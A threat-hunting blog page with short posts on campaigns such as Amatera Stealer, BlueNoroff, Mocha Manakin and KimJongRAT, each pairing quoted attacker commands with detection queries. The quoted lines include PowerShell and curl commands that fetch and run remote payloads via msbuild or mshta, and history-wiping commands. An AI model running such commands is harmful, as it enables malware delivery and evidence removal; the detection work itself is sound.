Posts

172. Another Curious ClickFix PowerShell Command

Image
Hello everyone! I think already everybody knows about ClickFix technique, but we still see new and new variations, especially if we are talking about a command a victim should paste. Proofpoint has published a report on Amatera Stealer , and the adversary leveraged ClickFix technique to deliver it. The victim should paste the following command into the Windows Run dialog: powershell -w h -c "$p=$env: TEMP+'\t.csproj';irm https://cv[.]cbrw[.]ru/t.csproj -0 $p;&($env: SystemRoot+'\Microsoft.NET\Framework\v4.0.30319\msbuild.exe') $p" The threat actors abuse PowerShell to download a malicious C# project file from a remote server, save it to the temporary directory, and executes it using msbuild.exe . So, as always, we can use suspicious command line arguments for detection, for example: event_type: "processcreatewin" AND proc_file_name: "powershell.exe" AND cmdline: (*msbuild* AND *csproj*) See you tomorrow!

171. Detecting BlueNoroff's Indicator Removal Techniques

Image
Hello everyone! Huntress has shared the results of analysis of a recent BlueNoroff attack involving a macOS device, a fake Zoom extension and even deepfakes! So, let's look at some detection opportunities! Let's look at indicator removal techniques. The adversary abused environment variable HISTFILE: unset HISTFILE We can definitely use it for detection: event_type: "processcreatemac" AND cmdline: "unset histfile" Next behavior - removing shell history: history -p > /dev/null This can also be used for detection: event_type: "processcreatemac" AND proc_file_name: "history" AND cmdline: "dev//null" Finally, the threat actors remove shell history files: rm -rf ~/.zsh_history rm -rf ~/.bash_history rm -rf ~/.zsh_sessions And yes, this is another detection opportunity: event_type: "processcreatemac" AND proc_file_name: "rm" AND cmdline: (" zsh_history " OR " bash_history " OR " zsh_ses...

170. Hunting for Mocha Manakin

Image
Hello everyone! Red Canary has colored another bird . This time the cluster is called  Mocha Manakin . The adversary leverages ClickFix technique to deliver NodeJS-based backdoor named NodeInitRAT . Researchers note that ths activity has overlaps with  Interlock ransomware, so it's important to detect this as early as possible. They already shared a few detection opportunities you can use, but I also suggest hunting for suspicious events related to PowerShell spawning node.exe : event_type: "processcreatewin" AND proc_p_file_path: "powershell.exe" AND proc_file_path: "node.exe" See you tomorrow!

169. Regular Stealer - Lots of Detection and Hunting Opportunities

Image
Hello everyone! We can get threat hunting and detection ideas not only from advanced threats, but also from commodity malware. Let's look at KimJongRAT infection chain described by Unit42. Here we're dealing with malicious LNK-files ome more time. The file executes the following command: "C:\Windows\System32\cmd.exe" /c cd /d C:\Users\<USER>\AppData\Local\Temp && curl -O https://cdn[.]glitch[.]global/2eefa6a0-44ff-4979-9a9c-689be652996d/sfmw.hta?v=2 && mshta C:\Users\<USER>\AppData\Local\Temp\sfmw.hta Once again we see cURL abused to download a malicious file, this time an HTA, and mshta.exe to execute it. So, the first hunting idea is to look for cURL downloading HTA files: event_type: "processcreatewin" AND proc_file_name: "curl.exe" AND cmdline: "hta" Next thing - mshta.exe and suspicious folders: event_type: "processcreatewin" AND proc_file_name: "mshta.exe" AND cmdline: "local\...

168. Adversaries Abuse LLM to Generate Malicious Scripts

Image
Hello everyone! I'm sure you already use LLMs to solve various security-related tasks. So do adversaries! For example, let's look at a campaign uncovered by Qianxin Threat Intelligence Center. The threat actors used Telegram to distribute archives with malicious LNK-files. These files abused cURL to download a malicious .vbs file from a remote server, for example: C:\Windows\System32\cmd.exe /c "curl -o C:\Users\Public\aa.vbs https://zl-web-images[.]oss-cn-shenzhen[.]aliyuncs[.]com/5C25D918A2314DA2AC8D3C704287E278.vbs && start C:\Users\Public\aa.vbs" Here we have a nice hunting opportunity: event_type: "processcreatewin" AND proc_file_name: "curl.exe" AND cmdline: "vbs" So, if we look inside the .vbs file, we can see that it's very similar to those created with LLMs! That's it! See you tomorrow!

167. Adversaries Use Weaponized GitHub Repositories to Deliver Malware

Image
Hello everyone! Trend Micro has uncovered a new threat actor dubbed  Water Curse . The adversary uses weaponized GitHub repositories to deliver multistage malware. Researchers already identified at least 76 GitHub accounts related to this campaign. So, the project files contain a snippet of malicious batch file code inside of the <PreBuildEvent> tag, which would be triggered while the code is compiling.  MSBuild.exe spawns cmd.exe , which drops a malicious .vbs file, for example,  C:\Users\[redacted]\AppData\Local\Temp\ohQ13W\XHa0aaUw9.vbs . And yes, we can use this behavior for hunting: event_type: "filecreatewin" AND proc_p_file_path: "msbuild.exe" AND proc_file_path: "cmd.exe" AND file_path: "vbs" See you tomorrow!

166. Detecting Windows Problem Reporting Abuse

Image
Hello everyone! You can get detection and hunting ideas not only from threat actors' behaviors, but also from security researchers! For example, Adam shared an interesting case of Windows Problem Reporting abuse. This executable has many command line arguments, and -boot one allows to load the following DLL:  C:\Windows\System32\offdmpsvc.dll . It's not available by default, so an adversary can use it to write a payload there. It means we can use this argument for detection: event_type: "processcreatewin" AND proc_file_name: "wermgr.exe" AND cmdline: "boot" See you tomorrow!